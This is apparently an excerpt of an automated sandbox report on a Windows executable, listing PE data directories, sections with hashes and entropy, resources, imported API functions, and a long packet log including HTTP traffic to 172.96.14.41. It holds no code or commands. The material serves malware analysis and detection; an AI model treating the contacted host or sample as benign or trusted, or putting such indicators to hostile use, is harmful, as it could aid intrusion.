                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x11180.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x89c080x9d0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x615d0x6200c5c0065fc4c103ac2469dafdce131fb4False0.6616709183673469data6.45041359169741IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x80000x13a40x14004ac891d4ddf58633f14436f9f80ac6b6False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xa0000x203380x60066b45fceba0f24d768fb09e0afe23c99False0.5026041666666666data3.9824009583068882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x2b0000x550000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x800000x111800x11200154f08293ebbaf4693da668407e6410eFalse0.1918196852189781data5.314558177965985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x801d80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.17950727552348278
                                                                RT_DIALOG0x90a000x100dataEnglishUnited States0.5234375
                                                                RT_DIALOG0x90b000x11cdataEnglishUnited States0.6056338028169014
                                                                RT_DIALOG0x90c200x60dataEnglishUnited States0.7291666666666666
                                                                RT_GROUP_ICON0x90c800x14dataEnglishUnited States1.15
                                                                RT_VERSION0x90c980x1a4dataEnglishUnited States0.5547619047619048
                                                                RT_MANIFEST0x90e400x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 24, 2024 09:02:12.154478073 CET49676443192.168.2.852.182.143.211
                                                                Jan 24, 2024 09:02:14.560916901 CET49676443192.168.2.852.182.143.211
                                                                Jan 24, 2024 09:02:15.654470921 CET49673443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:16.013854027 CET49672443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:19.363161087 CET49676443192.168.2.852.182.143.211
                                                                Jan 24, 2024 09:02:20.638875961 CET49671443192.168.2.8204.79.197.203
                                                                Jan 24, 2024 09:02:25.263833046 CET49673443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:25.623229980 CET49672443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:26.972520113 CET4434970323.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:26.972620964 CET49703443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:28.966969967 CET49676443192.168.2.852.182.143.211
                                                                Jan 24, 2024 09:02:37.901494026 CET49703443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:37.901561975 CET49703443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:37.901868105 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:37.901921034 CET4434970723.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:37.902045965 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:37.902307987 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:37.902326107 CET4434970723.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.046581030 CET4434970323.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.046608925 CET4434970323.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.204869032 CET4434970723.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.204937935 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:38.297651052 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:38.297676086 CET4434970723.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.298579931 CET4434970723.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.298742056 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:38.299385071 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:38.299443007 CET4434970723.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.299698114 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:38.341902971 CET4434970723.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.474270105 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.605386019 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.605671883 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.605853081 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.723602057 CET4434970723.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.723773003 CET4434970723.206.229.226192.168.2.8
                                                                Jan 24, 2024 09:02:38.724060059 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:38.724060059 CET49707443192.168.2.823.206.229.226
                                                                Jan 24, 2024 09:02:38.736567974 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.736705065 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.736745119 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.736785889 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.736831903 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.736831903 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.736831903 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.736831903 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.867701054 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.867765903 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.867805004 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.867822886 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.867822886 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.867844105 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.867858887 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.867882967 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.867918968 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.867923975 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.867960930 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.867964983 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.867964983 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.868000031 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.868040085 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.868040085 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.999484062 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999511957 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999571085 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999613047 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999620914 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.999620914 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.999620914 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.999654055 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999663115 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.999677896 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999721050 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999759912 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999794960 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.999799967 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999839067 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999845982 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.999845982 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:38.999878883 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999917030 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999954939 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:38.999994993 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.000004053 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.000004053 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.000035048 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.000078917 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.000133038 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.000133038 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.000133038 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.000133038 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.131926060 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.131995916 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132009029 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132035017 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132042885 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132085085 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132117033 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132128954 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132136106 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132169008 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132195950 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132208109 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132210016 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132244110 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132255077 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132285118 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132327080 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132335901 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132343054 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132369041 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132370949 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132407904 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132417917 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132446051 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132457018 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132483959 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132500887 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132528067 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132533073 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132566929 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132574081 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132605076 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132612944 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132642031 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132651091 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132679939 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132687092 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132719994 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132725954 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132760048 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132770061 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132797956 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132808924 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132836103 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132874012 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132886887 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132913113 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132956982 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132971048 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132994890 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133001089 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133033037 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133060932 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133073092 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133074045 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133116961 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133131027 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133155107 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133196115 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133233070 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133272886 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264233112 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264262915 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264277935 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264313936 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264333010 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264379978 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264391899 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264405966 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264416933 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264426947 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264430046 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264444113 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264460087 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264465094 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264465094 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264472961 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264484882 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264484882 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264497042 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264508963 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264512062 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264524937 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264528990 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264537096 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264552116 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264552116 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264566898 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264578104 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264579058 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264590025 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264599085 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264611006 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264622927 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264626026 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264626026 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264636040 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264642954 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264647961 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264658928 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264661074 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264674902 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264688015 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264698029 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264703035 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264715910 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264729977 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264748096 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264750004 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264750004 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264750004 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264760971 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264766932 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264775038 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264786005 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264786959 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264801979 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264816999 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264816999 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264830112 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264832020 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264842987 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264858961 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264866114 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264868975 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264868975 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264873028 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264898062 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264909983 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264983892 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264997005 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265008926 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265022993 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265033960 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265034914 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265052080 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265064955 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265072107 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265072107 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265079975 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265091896 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265094042 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265100956 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265105009 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265108109 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265120029 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265126944 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265135050 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265142918 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265147924 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265155077 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265161037 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265166998 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265168905 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265173912 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265186071 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265193939 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265201092 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265222073 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265234947 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395216942 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395284891 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395286083 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395328999 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395730972 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395780087 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395797014 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395809889 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395821095 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395832062 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395834923 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395838976 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395847082 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395864964 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395885944 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396066904 CET8049708172.96.14.41192.168.2.8
